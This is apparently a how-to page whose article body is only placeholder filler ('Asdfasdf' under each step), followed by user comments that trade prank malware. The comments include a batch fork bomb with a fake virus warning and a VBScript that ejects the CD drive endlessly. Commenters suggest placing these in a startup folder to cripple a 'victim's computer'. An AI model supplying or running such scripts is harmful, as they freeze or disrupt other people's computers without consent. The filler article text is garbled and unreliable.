Asdfasdf

146K2850

Intro: Asdfasdf

asdfasdf

STEP 1: Asdfasd

fddasdfasdf

STEP 2: Asdfasdf

asdfasdf

STEP 3: Asdfasdf

asdfasdfasdf

50 Comments

is there any way to abort the process once it has started

as this comment is from a few years ago i expect you wont read this but "pause break" will stop any batch file so it stops doing things

mhhh you have to open task menager and shut down the prozess ........ But if you just didtn write the "goto start " you can just close it

i know you commented a while ago but yes. if you simply close the command window
Amazing!!me and a friend have been looking at these codes and we have made a code that laggs and opens the cd drive!

you should add timeouts and an auto restart

Actually using loop with loads of starts ok too

If you want to harm their computer...

@echo off

echo The Virus Has Been Downloaded

ping localhost -n 5 >nul

cls

echo It can't be stopped!

ping localhost -n 2 >nul

:loop

start

goto loop

============================================================

This command will open google forever.

============================================================

Or...

@echo off

:loop

start

goto loop

============================================================

Is a simpler version of the top one.

============================================================

Open the CD drive over, and over, and over forever.

do
Dim ts
Dim strDriveLetter
Dim intDriveLetter
Dim fs 'As Scripting.FileSystemObject
Const CDROM = 4
On Error Resume Next
Set fs = CreateObject("Scripting.FileSystemObject")
strDriveLetter = ""
For intDriveLetter = Asc("A") To Asc("Z")
Err.Clear
If fs.GetDrive(Chr(intDriveLetter)).DriveType = CDROM Then
If Err.Number = 0 Then
strDriveLetter = Chr(intDriveLetter)
Exit For
End If
End If
Next
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
For d = 0 to colCDROMs.Count - 1
colCDROMs.Item(d).Eject
Next 'null

For d = 0 to colCDROMs.Count - 1
colCDROMs.Item(d).Eject
Next 'null

set owmp = nothing
set colCDROMs = nothing
loop

And antivirus programs detect it as a potentially harmful program!

Put this in startup folder and your computer will be really screwed up.

Awwwww nice best prank evr

:3

This is amazing! I searched about 20, and this was the best. Simple and effective, this gets MY thumbs-up. But... if anything, what happens if you DO "press any key"? Does something actually HAPPEN?

Because there is no code after it it will just close and stop the cmmands.

If you press a key it will re-open itself over and over again until it causes your computer to crash with lag. Have fun!

yeah it starts his selfe again and again and again so you cant close it

nothing happens thats just a message
so it's a fork bomb and a fake virus? 2 hits! however, if you wanted to not do the slow part, you could write something to close the bat as the second one opens.

Well, the actual purpose of this .bat file is mainly to mercilessly slow the victim's computer, and the command to close the command prompt is "EXIT," so instead of typing "GOTO START," type "EXIT." This will close the command prompt after each restart, unfortunately, not slowing your victim's computer, and losing its effectiveness. Hope you found this information helpful!

(quote1) --> "Harmless in every way."
(quote2) --> "GOTO START : This tells the computer to run the file over and over and over again without stopping which causes the computer to freeze since it gets opened so much."

OMFG Freezing your parents computer is soooooo harmless :P
More Comments